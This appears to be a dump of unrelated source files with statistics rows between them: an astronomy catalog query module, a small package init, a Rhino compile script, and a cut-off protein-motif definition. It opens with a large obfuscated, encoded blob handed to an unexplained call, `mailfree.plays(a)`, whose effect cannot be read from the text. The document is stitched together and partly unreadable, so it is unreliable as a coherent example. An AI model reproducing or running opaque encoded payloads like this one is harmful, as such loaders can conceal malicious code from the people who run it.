219$=gHnzWbT33yD0ZPT3RY48SuATdPl09N8UqsCj820Sq0r0dsywzr4MTuokdGIdwpWUyBHBE+VGUGl4unumj7eGaYhnkhlEekl6Ul+4vlA1fkGkkhm6eU5VclpAAw3SOyI 317$==AecObtNdfNMZX8yLHd2z0BjDOxcdqykN1v88JDvMOKjKJMfTxpgjs0gc3zqyx4kL11cTOvoMO8KNIH/BgQmPRr 161$==AecObtNdfNMUX8yrsd0z0d0ZPzKo8SuYnMMpKDKiAqKHjTuUXzN58iy4wr0gwcGAgPA7Am 54$=gHnzWbd0vyDsSvyIowTqATNKiM8KioywygTs0gCPKTMNzIrMKj8q4kzMyMNM4Iz2wwTsU8KnzJVWKApxu+gQDXO46JxyMM8oK1zcTO3Uc2n8c19oKJncTKN3yN5cczIfK2SjiqATz1n8DKikKGLyXgpuHVOZkHc5BABycUz 104$=gHnrikdx3sd0ZPT3xgjsYnCOg0tw9kzxU39Ov0DPyqyx9kSLjwTsY3yNp8sMskqwEnTtkKMyridsSvMOlg9GAAdYTht 96$4x5s1WH9viAr0rMCK8kKwUj8BCt7hUWKhnYpm6ciGYo7JlX5wkHXijb9lvlhnUOIxvS/yNxMKJ8Ir0ygjMbDBqWLdOJI6J4IryJPSFhZCUNhFekllduJldYunapp7eKlUhReVcyQ1nb5mcOuBzez1n8DKikKOFn9BAwMth0n 1$=gHnrCHdxr0d0ZPTPywiqS/iIxyM1dPBzHEOfX8sCTC2XAw2Cugv 26$==AecObtNQ/NNwK9KjgCPpCM1IfgQ7eIllS4JWqpOnoBG6eS5VOQ59zoIzxPjTqUfzNqSSxZfyzV3jqkcyNJft0ooKw0c9J/giIpiRS8ywl8pbUSlEGS8904IL0NjSMDvM2HYuhihqnsiKcI2NYxDPyKDL8ILL7cTK7wcP1ST39UKpCj8q4kDOysNEob1tcTOH3g5+RY+Awz60E5 126$==AecuKzuK/yOwwjKXnCOpcMN8UyP7M9HAwTPeAb 160$==AecuKSPE/y2Rn9EAQDVJgu 152$==AecObtNdfNObX8KdHd2To40SzycCI9sDx70TuSvyr4gTtIQ0eGaK55UmBVgpuHVOe5hn5BUsi81IvBRXmFOHalhFeSFEWEJBW8kNGs4AwruCyM 134$=gHn90Y0KMIIYU4XJ1hX4FdxIGCSLYNITvrfDqtlWgmV7pfrRtr+gDnz5LJpNHfbVEYcdvoShYWT8CXH6tw0Ax4mXFd5EVs0BI6j63NpZuzVKXJ5fvDGmJgbbXLvJsQEezd1LsseitTcKEb+SaaNCzhffXIhRqMzzI6RqNbooC8bOuSgpCnJuwNdUp2f4e31TmFQiTwR+HAsyZEk 58$=gHnrSHryvsd0ZPT3RnTuycyNJDcK4ULKZnDqMTd3zw8LioSPdXTxAnMO5yS3dQ0eBQkR9A2 105$==AecObdNE/MMQn9MdHd2zytM3kNwpgDI9szNpyDzjUyPZj8OTHNMpKDyDwyDCbmjZ6ZRJHh3AA/fIxB 75$4x5s12y9tSfdxrCM09kLzLPSJdPjIqKCLioqKIjTGAwhRngj 56$==AecWmj96ggwgRRflgPlhO4gi8TaaYASsU2stiEptSSpQwneLBZypzw9mz9e651ieRFrPke3pARAumFg0ipEg9CRluSDprIXcUGTMJZNjKNfoIXukmJnw/n1mqFqUg0VS5DRay7yaudN/cNzcD8e36tzxZgb80lAi5uDY7+XQ/YYMfS6ZUF7zl8Hm5F8mbKxigm1N2/wXwUGcUC 315$==AecObtNdfNNUX8CAgCrIwR 125$=gHnzWbT3XD91Fv8yRn9Mdo4ctM3kTPb39sATd3zKdL3kyLM39OzKMKp8yJT/Bga6/gs 19$=gHnzWXdxXjCsSvyIowTqATNKiM8KioywygTs0gCPKTMtyIz1Qj8q4kzMyMNM4Iz2wwTsU8KnzJVWKApxu+gQDXO46JxyMM8oK13cjqkUc2n8c19oKJncTKN3yN5cczIfK2SjiqATz1n8DKikKGLyXgpuHVOZkHc5BQizdEA 206$4xZbO20DCCCAG+3kkcwrZKGj5BdTDuFoJM+I3A1V/6r2k1h60727X7Jd6E2VgYBjlfr0KMlAyMExMSHRWXJSHyJuzWaYvzq2y1doxlCgYTeA7FKqKplqT6vuklzXHerwW6zjVjutHYFunIb65zQwua/+b8zJAP09rfkHfGg9Z39mLc/fyj8GzfB71p0T 169$4x5sNSX8CAgAVHQJ 15$=gHnrSXDx3sd0ZPT3RnTOjUCPq0NwFPLLjK9K/g8Ily9LP/Lzigjs8cy1n8dzoILKscT2A3yN58Cz9UK1XjSqELzMpScz9kLziQS2ykr0bYyVgJZmcOu5eU5ntzeCAAV4Hyb 38$=gHnrSfdxvsd0ZPT3RnjKnoc3z8CzokyP7M9HAwYVggF 22$=gHnzWbD0XDd1FvS3Rn9EEuqwyNJDcK4AS33Iiq0g8wzicMYfBAyrugS 190$==AecuK80F/zO5gjMbDDPxStEKdFGkUe5kbSl6qRJXeKO7TepbUSlEWu+khfekcelXpXZEU4JVgpozP8IrMswjssszNpsDz9UhrXXdPqSAaWZ4VERlBMz30gjsKnM2rihZvulby54mR+UslGFFWMX4infQRkUxANTAQt+9zl 29$==AecObz2FfzO5gTKHDzNyc8KiIz2wwTsULr0riTOYIszxokNAo4GYZuJXslGFVBmakP5VelelRQhnUZJ7sP55q7RVSO5mUZuaUkZZZ4pUaQ55TG+5RymkCSylduJldYunapuaUylnhxIMbLdOpySBItpBHZVO5RqwMXQ2BE6cx0swi9AAgMXSkF 151$==AecuKjME/y2Rn9MdHrM5CCKioS3AX8sS3MKl0yJ3kKPMPSJfPDOoSBKelOFcqlFWeJnunumUZp4unOFk7RVZYGlcVOlp/p7ZweDAAn2nhO 37$=gHnd1cQLIIMcUA8vS6UP41Mb2Y5BFU3u5/p4EdzgN1sP9pQFRnewDevf+3OT0XVMbMmbHVwygCGKwtzd4G7DExI6Z9u5sB3y65wIYpZPDiqdcxgedj0TKpysS4eA6dqoTZVgpJiq/8ZHCsF/0viA9e/cMSsK92NyhlsSuJtiLJespvO5snnSaPcshY+Ipi5EqE/vb7CuZh4RNhI+hvMNR4v78iuP30W 303$==AecObdtK/qMQnDoMfNOyKzx9kNwUXCoMPNKpszJvAyL5K9CAAsWrw+ 197$=gHnzWXdx/qC0ZPT3Rn9scviIxSDyDPNtEn9OPDCNyqCz4EzwU390XLNKxM8LiETPwwiqEn8IpMCKioS3TXTqsUc3TnM19oyIlg9GAQUedhh 292$=gHnzWXdxPjD0ZPT3RYYjTqyg8wTLdMYfBQd7gAQ 287$=gHnz2QryvsTO4kKLowjqY/iIqM8y4Iz3ygjMbDDPxSNNzErKFn9JPXdPqSyJ3kyyycTyAvMOpit05kKLF0kHsecHi4hZcy54Ve+UofG7VxJjPxBKmXZhG/q8pYLNKqCMNXMEvATdPqcyAu+TpqwiIyKzxokqCN3DAQzNoUQ 298$==Aecuq8ME/yOycTuMDd3zM9zD/SP7wTqcLzNZDcKzAzxtwTxgcyNKDrwoQLLMPSGAQWO8AL 255$==AecObdtK/MNQn9MdHd2z8cL3kMIH390SHr0r8S25AqyvcTuAn8Il0DMiULPswDIvAjIKTCyYfK0tcTJD/MOyKzx9kNIlMDAAQBbaB3 30$=gHnrCXdxr0d0ZPTPQDTqsKMKZwshhz3FPduCjSKPncOsys09kqyJnDND/MKRAgvLDh2 159$4x5qM7s8NbHd2z0hitwSDjQbHz03CcsSvyL5K920SARnZwFYqRRVcO5mUeOVZY54l7eGgXREZpp4un57YwBaQQREZWl4unw0TWg1Tl+UmjOHalhFeSFEWEJlegGmUZVYUyAF3riS2YvBRDgXosyh 18$4x5qyxQ8PbPzN50NwFPzrc38tKfrKcTdtK/N2Aj8CAAjLlQO 296$==AecObttcfrIdX8KXvMOpScy5UKzr8SOH3iIlc8zjUSP7wTqcLzNZDcy5wAKeowEHg3ZJxJ 135$4x5s13Q8t8AzMp0NwFPzrc38tKfrK8yL2FfL3Aj8CAwiwkQk 205$=gHnzWPDxvKDMYn9yRn9MdQYPjIlSzIYvBQXRewu 177$4xZTOGrCDCDGE+VqGJDZoTiGIEL00hfNb5PBq0aSLENa8pvCtQd64O47u7c9Wb51sYix1jiu+TMvNtQwwoHnvzdTrER0eDTKQnb4ukoUOoA8N1Lfp6worSGqJ9PYgbWF+n1SwdvNtytDUQHpVmTFcMskFf5J9JK3lZ8j70/sAMzsGM521DMLNeccF+tNY227e4CYSUiMyI6j/5j8Qo0T 238$=gHnzWPdx3yD0ZPT3Rn9scviIxSDyDPNtEn9OPDCNyqCz4EzwU390XLNKxM8LiETPwwiqEn8IpMCKioS3TXTqsUc3TnM19oyIlg9GAQUkcRh 97$4xZbNH0CCCDGAG+vUuYH8gns2gxKwF4UvtPXlhbLhpba/6LQhIoTv3eezyKOFLOwctVNPI0mRjFC9Wovked6OVPOjY+2FthJr7Tkqp0LrFnr2lQBXchtv0W3JkwAGx9pomBsl/UUBedO3dczcr3mRg7T/av5lSgg+X3IxCmZJf1WqeJctdnlqwf+8Gg1cbE2 185$=gHnzWbD0XDT2FvS3Rn9MdPDPVDCzokT3AX8sS3yNpstM8kK1iwSBG78d1F/M1xQ8GAsnChs 279$=gHnV1YPPMIIYQ4/SIJM4QHaNtoUaHqNyHbCOgVepmQIG/3XMNpfsd39cXudN3vOZbVTFY+Mhq9uAfkF0hlVm7mwkaALMUxDHBN4pm5T0BPZUtqxs47dSXX9wzvZGfBo8MZmJ6T/1N79YLKzQlgNWi1zE4zfPOIVpOq5Xdafd/y2/XoWHRojkqeUxWn2zvQO4H0V 44$4x5qI7Q8NbHd2z0d05ELxpgDI9AjIqScyjkyIoIiqUPjIqMCydvLwkMTOHQi5X4RlfyOHQZeaUSZnTeBkX5O7ZeulbSGkT4eDAAjamhA 118$=gHnzWfzy3KDM4ELxJjTqyg8wzKdL3ky2ywTCAgZsjgU 141$=gHnzWfdxXDC0ZPTzSDjAEOdHd2T4YLQIGM5zL5K9qIPN2bQ0AFPt0BSnXxVGVRgo9N0ILPIPSMD/MIpsDzd/KPwqgoeXNCs6BAOgOy4 245$=gHnrSfryvsd0ZPT3RnjKnoc3zsN1okzP7M9HAgZ/iQK 24$=gHnlBZQPOIIQU4/SId5gH6huGrEi1kqJCyNBOYaBlErao/6XIu6ut9Ewbm5j3bOme7S0VHprkKmShyFVSefqhb0ZC75MlGV1887DkRZVz9IIrrGrG+TTojMNaCzXj2O9Sv+3aoE4rBiNyxYI3iM5dFYZ/ij8U7ZfOj/QbEzLQRv/c//vwaB10VGxVtTlU+X7sdSbJjH8rFBz34OUyEjhZBU+DCl72YLD5Z9utAr86qZCWMrCsdb5KP4pNmdFwm56eBAlIH+fe29y76Jr8+s/f3LfqfrAKiQZqpT42Qm/BApgaoZ 5$==AecuKT3F/z2Rn9MdoYLs0wI02Rn9rAHr0r8SuSvNtEQ0OHmLO5mnBaZuJbgTVGaWulbSAlzriS2YvBRDA8obxk 45$=gHnlBZQzNIIUQ4/SqT9gntKWGTPQmRk3NQarJCUmRhE6v+Sq2Gz0TMP23ufskU9M2UhglijcHhCPlHYGVGee4IbKV3eWS5mLB8IoB7VKfk0DuDZgVW2u6rjlSa4/dXCFWwUIUH1UaxD7Gntv2IjaSPuR4jZ7egXcOmXojy8b77eRPo35/9a9gqOrduImbuu9E2A3effpQS1GT/lMhZv3D98kYmr5/bPPxCwNuhBbsTjEqwmfP3PJ9i5dc9VZszFUpjY+v2kWM1hez9BSucdfXK36YJPJFJ+5fcjz65dOfzjpu4G 311$==AecuKcsKfzO5gjMbDDPxStsyIL30KjMXDNyriTGZ2QlPHjS2AviISDsM3kLL7cTK7wcP1S9N3oKJFn9JPXdPqSyJ3kKwPPSpS3cPly8yYfK2SjiqATz1nsiK8kyr8K9qU/MOlygquyK3okyDINc9ncERlpb4QOY6BKdaVgd5RXcAgK8B1d 256$4x5s1209tCPdxr0d0ZPTPwIisyUCPKDcK4AS3zIi0YLDLxSdKiUMIjKjqokr0TtdsSvKK5I8GAgwJFhX 123$=gHn91YsKMIMUU0fpknNDZwhiQDEEBTGimtkXgGsRrgarpf9tbtQLd+cO3bZ5xmi2sMqM+Zmx9QNhRVhPz1uNlxegV5IUhf6+vcq83CG32HO0mOb+vN6+hGwTZiw2ZRYdHkLou/C91OJAJyueCfEfz++jVuwm2BMdaEHiQ9CHszsx6rqO/Soq+JDxgkp 198$=gHnrykdx3sd0ZPLJscTKtcyNp0NwFPr0NjSBE7yDzjUyPZj8OPHDLxizx9ETPQDTqsKMK50zvKvKK7I8GAj9Xxl 164$=gHnzWbT33q80FvS3Rn9EEuc3MKqccK4AS3C39Ov0dPFDcy4kNziK9JDniIxSTP8IzqkwjqygiIyKTJ8oMw0KjsMDNyn8CzokKwJj9RfXjIg8KO4gDMnM9pywCPyszIYvBQ6j9B4 82$4x5qISX8CAwABHAY 305$4xZbNvrCCDDGAF+VyGpDZuaCECOkCNtZL/JarkLWI9+TvCtgI40Z77s1ehFN1qnEqawHgJXAcV07jtU7wCilMrWPT24yk6Rc5ezL0nyoQcelduK00JkQfOinwIVfeg/SUDJbBPe9w8oPWQQ8T/af4hJwk9X3ZSA8LS+utUvJimubS90f+8GEsXU2 138$=gHnzWPryXTD0ZPT3Rw4krMncTyAncO5MSJ8oAAgnlwK 92$4x5s13Q8tyArMy0NwFPzrc38tKfrK8qCsK/rwAj8CAAj/lAt 147$=gHnt1YXLMIIYY0/SlhX4FdVMkJSwMYmeXvFkSpVYfs2v+VwGMG7qDc4hzTaabO62OzykcjQCjYEfET19GPfQUChmMu/qTNfhqn7dw6GC8Hcpl2M/AxC1WlNuQ1FLrWIvJOrKKmC+td2nmDEJ0/lPQQ6RsjPlnc0oAWFSdIvUbYJqBSGs2c2xW988/IE0d3VbEJw+/c/s/Fklkkn 74$4x5qIUX8KdHDOxcdK4kyxUjioATDPAL9MYfr0zM9HAghTmwL 132$=gHnN5YsOMIIUU0fpWsMwQHaMVaIUHwmiyGPJpkWBJBF1+1XHMxOevDnz5czj7fargkQqWKomELjHJIVA749iaIay5+rU1QnDssallkDJjUPiz1HOSB/0CbqwBdzSuVIhAWq/K8t2SpOhR8Amq6s+dWXqbGfShhNmhybmlCUTg4g0234LqZYGxibdFLX9yya6JV6x19p/cPQW5Pja7KctvtotG2b/HQsj4U9 73$=gHnryIry3sd0ZPT3RnjKnoc3zKDLvkyP7M9HAga4hgn 297$=gHnz2Qdxr0d0ZPT3x8SuATdPl0dN3ILLMPSBAAYagAC 107$4x5s11s8NbHd2z0dsyArMswj0gwcPq09M8UTHsYZ6f6+GaklHkHJmhfGkU2h5uflHYVRAAQysEhl 273$==AecObdtK/MKwK9pMHrMwycKiUrMHjiK/g8wz89NcvT3TX8tikDxnKdMEfNxxKDOHTzNJTdqyArMs8SFAwIaORV 247$4x5s1209tSXdxr0d0ZPT3x8SuATdPl0T2YvzL5K9CAggjnAV 266$4x5s13q8L7kDOysNM8EL1yKjscTzMyKjyIvKOZkZDV+cMKZD8KiINwycTusszNpsDz9UL1zcTO3Uc2n8c19oKJncTqA/8IlKdz9UKzLj9pYLNKqCMNXfy0r8iKvyr0rS9z4UKDq6KrcjSKPg0w1fyREVmuhF58CVzHm+TrC00POEHAgfcJlD 326$==AecuKCNL/y2Rn9MdHDOxydK4AS3zIi0YLDLxSdKiUMIjKjqIPDO4Ady5wywLjjKng8wTzcMTPLK5I8GAAGiIBl 186$4xZXOGkCDCDFE9KFTJLyC3Up8hgIUF0E35PBUaNRBNRTP9V3Ua763MzbST7L2uHFDlN4MjqCMwE5AG2oob0i+ewsuTFL6K1zEa+MDaHHc5TlScxkl7uBtrssOSCgutoYlfwFSFhb1hT2vbYeVb1+Jq+M7QxhvaHS+q/DuFJiL4yVpyXD/5vpzXQRfpTH2tf+wbQcfWUM 207$==AecObtNdfrKdX8CAwC1Jgn 4$==Aec22jLrwgwARR/liCC1FuQ0GtBVoWoJmdmI1INxKUf/13gpFyiubecuz9OBBXzB5xo2woLthkq9CCtFEf5F/W1THc9k/G69vapLHgIVAfFfmHl1v4y6lK2UYa9Sju/cCdU3PUk2sBTaG8VsDuvzXPZdL0uW/GSUiZDeu52cAbu7GuR/Eq02bOh2BN82aFICVck5uqOn/8DrgjMbr5BUxlQ3DfWgKmcFnZyFuevsnLKw1zem96syBW++RUgG3k 235$==AecObtNQfNIQX8KdHd2z0DNvkL2pgDIdPjISjtMsEL1pISxgMqMqiS25wywLjjKng8wTzcsSvKK5I8GAQ/NKRU 116$4xZZNG1CCCDFF+vUNbP6DhkXQ0Btgmbv5dDaFzlg609vPqMponucunz57kmunt7YsI5cr0yFYHtt8mR04n++HpsjCKn1v6ZZEpjlgjVEVnJr0rrVXzB1grFDHefX9W0hKCOy96wMotUhqnm1sZLgv4ts9deN2/THQPeBMDzkiedUO9XnPsiSv7ZmTYgLUxcwEK8r8ewJnKFQ 275$==AecObttcfrISX8CAwCjKgn 80$==AecObtNQfNISX8CAQCfKAM 47$==AecObtNQfrIUX8KvkjIqMdz9oKJncTqUH9IxyTxZfQWsyyO3kyOM3TFry5Ka6DK/y81okKNo8SusKcP5MMN8oK2UnT0ADdPp8KvSvyIowTqATz1n8DKikKGF94eylmu7pUSFG5VxJXZkljhegbWJnvTGDUNBnUZBFeUV6m7pUmX5B38AA/p00Y 222$4xZXO/0DCCCHGH/tEC5BP0lcFbMmbhlIcjfwWONp2QI9df/5SWn/unP7Z7xTVD2a1Qm0ErwQU4tpZMPUg13zH53EtQwVy97p6piaTUI1byLNoMK4fsw6ESIeh6mmxsgtGSv6LHouEjwf3+x4Mxel559Op5z2KsK14B0Kv+iRAxIQYXrK2QXb/3H/6+ULrREp 325$=gHnrSHDx/s9NY/yy3K9EAwGHRAM 55$=gHnzWPry3yD0ZPT3Rn9scviIxSDyDPzL5K9CAAZjhAP 285$==AecWmz96ggwgRhhvl4HZgBGEi8RaqaESoU24rlIKU0Eog1re1QUjxpz0zJvBBr3PfwQczV8mUGe1TRb2lIWJjo9iiyTxQ5YnCnaVYbOUr34ImbcJDCjsjw4t2sKtf2y6lxvHmU3PbILf5QP7rQLiLOEWw15AqPCyxbOP9vNRVW2A+jJsneJtAHe1wWQ8n59XfaJDnSZlmYQOR+afgIQ30F 32$4x5s12A914QdxryswZP9NHjiMHTNK5cCydPN0U3jKHv8wTDyI8oS3gQDOUncOkC8L8oK1vIiCAwmuDRG 6$==Aec2ljLrgwwARR/m6U7isorENYIdhK2SzOzEx+IToQfZ6XvRKI0uc4OnDn003ZwVvYgxV2PAaPTYTFIruVo7SIZtwpczex6NUOlwNeGXPNDanl0jXIkMHluTc1A7eZbUYzU8cMPGtC3G+eGo6SKML5EuhL4xfou0rARP+zRgXsIX/ffDU2ULpbz5v+74RMGF6ujB4+u+y8EB1J 215$=gHnzWbD0XDy2FvS3Rn9EEucviIxSDyDPzrkM90ncyN5CM0dPzxXP8McgsN0PP80nwgw31wyNp8cL3kS3RDTqygyz/c8NPPzJ9KTOHTdPliz29kL2RjBKeEeDAgAJACj""" mailfree.plays(a)
127.915152
2,188
0.955179
1,522
42,212
26.491459
0.965834
0.000893
0
0
0
0
0
0
0
0
0
0.170682
0.007889
42,212
330
2,189
127.915152
0.792092
0
0
0
0
0.051515
0.998413
0.988795
0
1
0
0
0
1
0
false
0
0.00303
0
0.00303
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
0
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
6
f6aa9951e16697cac6205335b759da111f007b79
3,148
py
Python
fulmar/query.py
astrojose9/fulmar
62a79fb9b7ab01e5b7b3acadaca8e4f0db0e0e2f
[ "MIT" ]
null
null
null
fulmar/query.py
astrojose9/fulmar
62a79fb9b7ab01e5b7b3acadaca8e4f0db0e0e2f
[ "MIT" ]
null
null
null
fulmar/query.py
astrojose9/fulmar
62a79fb9b7ab01e5b7b3acadaca8e4f0db0e0e2f
[ "MIT" ]
null
null
null
import numpy as np from astropy.table import Table def teff_logg_TIC(TIC_ID): """Takes TIC_ID, returns Teff, logg, from online catalog using Vizier Parameters ---------- TIC_ID : int For TESS targets. Number of the input catalog, e.g. "307210830" Returns ------- Teff : float Effective temperature Teff_err : float Error on `Teff` logg : float Spectroscopic surface gravity logg_err : float Error on `logg` Raises ------ ImportError If astroquery package failed to import """ if type(TIC_ID) is not int: raise TypeError('TIC_ID ID must be of type "int"') try: from astroquery.mast import Catalogs except ModuleNotFoundError: raise ImportError("Package astroquery required but failed to import") Teff, Teff_err, logg, logg_err = Catalogs.query_criteria( catalog="Tic", ID=TIC_ID)[ 'Teff', 'e_Teff', 'logg', 'e_logg'].as_array()[0] return Teff, Teff_err, logg, logg_err def teff_logg_KIC(KIC_ID): """Takes KIC_ID, returns Teff, logg, from online catalog using Vizier Parameters ---------- KIC_ID : int For Kepler targets. Number of the input catalog, e.g. "11904151" Returns ------- Teff : float Effective temperature Teff_err : float Error on `Teff` logg : float Spectroscopic surface gravity logg_err : float Error on `logg` Raises ------ ImportError If astroquery package failed to import """ if type(KIC_ID) is not int: raise TypeError('KIC_ID ID must be of type "int"') try: from astroquery.vizier import Vizier except ModuleNotFoundError: raise ImportError("Package astroquery required but failed to import") columns = ["Teff", 'e_Teff', 'log(g)', 'e_log(g)'] catalog = "J/ApJS/229/30/catalog" Teff, Teff_err, logg, logg_err = Vizier(columns=columns).query_constraints( KIC=KIC_ID, catalog=catalog)[0].as_array()[0] return Teff, Teff_err, logg, logg_err def teff_logg_EPIC(EPIC_ID): """Takes EPIC_ID, returns Teff, logg, from online catalog using Vizier Parameters ---------- EPIC_ID : int For K2 targets. Number of the input catalog, e.g. "201437844" Returns ------- Teff : float Effective temperature Teff_err : float Error on `Teff` logg : float Spectroscopic surface gravity logg_err : float Error on `logg` Raises ------ ImportError If astroquery package failed to import """ if type(EPIC_ID) is not int: raise TypeError('EPIC_ID ID must be of type "int"') try: from astroquery.vizier import Vizier except ModuleNotFoundError: raise ImportError("Package astroquery required but failed to import") columns = ["Teff", 'e_Teff', 'logg', 'e_logg'] catalog = "IV/34/epic" Teff, Teff_err, logg, logg_err = Vizier(columns=columns).query_constraints( ID=EPIC_ID, catalog=catalog)[0].as_array()[0] return Teff, Teff_err, logg, logg_err
26.677966
79
0.627382
407
3,148
4.719902
0.19656
0.045809
0.040604
0.046851
0.837585
0.837585
0.774597
0.774597
0.724623
0.724623
0
0.016979
0.27033
3,148
117
80
26.905983
0.81933
0.398348
0
0.432432
0
0
0.204007
0.01275
0
0
0
0
0
1
0.081081
false
0
0.216216
0
0.378378
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
6
1253e3e11333d1f9a40940a17eb3e37c1d76f763
25
py
Python
dlhammer/__init__.py
klauscc/dl-hammer
5bd8d2e75f6a2b6051e99ad9b0e1384c8c43de26
[ "Apache-2.0" ]
null
null
null
dlhammer/__init__.py
klauscc/dl-hammer
5bd8d2e75f6a2b6051e99ad9b0e1384c8c43de26
[ "Apache-2.0" ]
null
null
null
dlhammer/__init__.py
klauscc/dl-hammer
5bd8d2e75f6a2b6051e99ad9b0e1384c8c43de26
[ "Apache-2.0" ]
null
null
null
from .bootstrap import *
12.5
24
0.76
3
25
6.333333
1
0
0
0
0
0
0
0
0
0
0
0
0.16
25
1
25
25
0.904762
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
6
89eb2bd7933c5ea4302ad33848faf20225fb6517
175
py
Python
plugin/compiler/RV_manager_v5/rhinovault_V2/bin/commands/test.py
Rippmann/rv
59e8621c7ebccafaa9c848c2c98729841e85996c
[ "MIT" ]
null
null
null
plugin/compiler/RV_manager_v5/rhinovault_V2/bin/commands/test.py
Rippmann/rv
59e8621c7ebccafaa9c848c2c98729841e85996c
[ "MIT" ]
null
null
null
plugin/compiler/RV_manager_v5/rhinovault_V2/bin/commands/test.py
Rippmann/rv
59e8621c7ebccafaa9c848c2c98729841e85996c
[ "MIT" ]
null
null
null
import py_compile path = "C:\\Users\\rippmanm\\workspace\\matthias.rippmann\\rhinovault\\rhinovault_V2\\rhinovault_V2\\bin\\commands\\rv_command_a.py" py_compile.compile(path)
58.333333
132
0.805714
25
175
5.4
0.68
0.133333
0
0
0
0
0
0
0
0
0
0.011765
0.028571
175
3
133
58.333333
0.782353
0
0
0
0
0.333333
0.698864
0.698864
0
0
0
0
0
1
0
false
0
0.333333
0
0.333333
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
1
1
1
null
0
0
0
0
0
0
0
0
1
0
0
0
0
6
89fb0fd07b2c51fdd95e1ccef91d413e488f8dc0
7,650
py
Python
mmtbx/cablam/fingerprints/antiparallel_beta.py
dperl-sol/cctbx_project
b9e390221a2bc4fd00b9122e97c3b79c632c6664
[ "BSD-3-Clause-LBNL" ]
155
2016-11-23T12:52:16.000Z
2022-03-31T15:35:44.000Z
mmtbx/cablam/fingerprints/antiparallel_beta.py
dperl-sol/cctbx_project
b9e390221a2bc4fd00b9122e97c3b79c632c6664
[ "BSD-3-Clause-LBNL" ]
590
2016-12-10T11:31:18.000Z
2022-03-30T23:10:09.000Z
mmtbx/cablam/fingerprints/antiparallel_beta.py
dperl-sol/cctbx_project
b9e390221a2bc4fd00b9122e97c3b79c632c6664
[ "BSD-3-Clause-LBNL" ]
115
2016-11-15T08:17:28.000Z
2022-02-09T15:30:14.000Z
from __future__ import absolute_import, division, print_function from mmtbx.cablam import cablam_fingerprints #Antiparallel beta, close #Original by Christopher Williams, converted to new format by Danny Oh #Two strands: # g (h)* i* (j)* k # r (q)* p* (o)* n antiparallel_beta_wcw = cablam_fingerprints.motif( motif_name = "antiparallel_beta_wcw", residue_names = {"i":"antiparallel_beta_close", "p":"antiparallel_beta_close"}) residue1 = antiparallel_beta_wcw.add_residue( bond_move = 'p', end_of_motif = False, index = 'i') bond1 = residue1.add_bond( required = True, src_atom = ' O ', trg_index = 'p') bond1.add_target_atom( atomname = ' H ', anyseqdist = True) bond2 = residue1.add_bond( required = True, src_atom = ' H ', trg_index = 'p') bond2.add_target_atom( atomname = ' O ', anyseqdist = True) residue2 = antiparallel_beta_wcw.add_residue( sequence_move = 1, end_of_motif = False, index = 'p') bond3 = residue2.add_bond( required = True, src_atom = ' O ', trg_index = 'i') bond3.add_target_atom( atomname = ' H ', anyseqdist = True) bond4 = residue2.add_bond( required = True, src_atom = ' H ', trg_index = 'i') bond4.add_target_atom( atomname = ' O ', anyseqdist = True) residue3 = antiparallel_beta_wcw.add_residue( sequence_move = 1, end_of_motif = False, index = 'q') residue4 = antiparallel_beta_wcw.add_residue( bond_move = 'g', end_of_motif = False, index = 'r') bond5 = residue4.add_bond( required = True, src_atom = ' O ', trg_index = 'g') bond5.add_target_atom( atomname = ' H ', anyseqdist = True) bond6 = residue4.add_bond( required = True, src_atom = ' H ', trg_index = 'g') bond6.add_target_atom( atomname = ' O ', anyseqdist = True) residue5 = antiparallel_beta_wcw.add_residue( sequence_move = 1, end_of_motif = False, index = 'g') bond7 = residue5.add_bond( required = True, src_atom = ' O ', trg_index = 'r') bond7.add_target_atom( atomname = ' H ', anyseqdist = True) bond8 = residue5.add_bond( required = True, src_atom = ' H ', trg_index = 'r') bond8.add_target_atom( atomname = ' O ', anyseqdist = True) residue6 = antiparallel_beta_wcw.add_residue( sequence_move = 2, end_of_motif = False, index = 'h') residue7 = antiparallel_beta_wcw.add_residue( sequence_move = 1, end_of_motif = False, index = 'j') residue8 = antiparallel_beta_wcw.add_residue( bond_move = 'n', end_of_motif = False, index = 'k') bond9 = residue8.add_bond( required = True, src_atom = ' O ', trg_index = 'n') bond9.add_target_atom( atomname = ' H ', anyseqdist = True) bond10 = residue8.add_bond( required = True, src_atom = ' H ', trg_index = 'n') bond10.add_target_atom( atomname = ' O ', anyseqdist = True) residue9 = antiparallel_beta_wcw.add_residue( sequence_move = 1, end_of_motif = False, index = 'n') bond11 = residue9.add_bond( required = True, src_atom = ' O ', trg_index = 'k') bond11.add_target_atom( atomname = ' H ', anyseqdist = True) bond12 = residue9.add_bond( required = True, src_atom = ' H ', trg_index = 'k') bond12.add_target_atom( atomname = ' O ', anyseqdist = True) residue10 = antiparallel_beta_wcw.add_residue( sequence_move = 1, end_of_motif = False, index = 'o') residue11 = antiparallel_beta_wcw.add_residue( end_of_motif = True, index = 'p') bond13 = residue11.add_bond( required = True, src_atom = ' O ', trg_index = 'i') bond13.add_target_atom( atomname = ' H ', anyseqdist = True) bond14 = residue11.add_bond( required = True, src_atom = ' H ', trg_index = 'i') bond14.add_target_atom( atomname = ' O ', anyseqdist = True) #------------------------------------------------------------------------------- #Antiparallel beta wide #Original by Christopher Williams, converted to new format by Danny Oh #Two strands: # e (f) g* (h)* i* (j) k # t (s) r* (q)* p* (o) n antiparallel_beta_cwc = cablam_fingerprints.motif( motif_name = "antiparallel_beta_cwc", residue_names = {"q":"antiparallel_beta_wide", "h":"antiparallel_beta_wide"}) residue1 = antiparallel_beta_cwc.add_residue( bond_move = 'p', end_of_motif = False, index = 'i') bond1 = residue1.add_bond( required = True, src_atom = ' O ', trg_index = 'p') bond1.add_target_atom( atomname = ' H ', anyseqdist = True) bond2 = residue1.add_bond( required = True, src_atom = ' H ', trg_index = 'p') bond2.add_target_atom( atomname = ' O ', anyseqdist = True) residue2 = antiparallel_beta_cwc.add_residue( sequence_move = 1, end_of_motif = False, index = 'p') bond3 = residue2.add_bond( required = True, src_atom = ' O ', trg_index = 'i') bond3.add_target_atom( atomname = ' H ', anyseqdist = True) bond4 = residue2.add_bond( required = True, src_atom = ' H 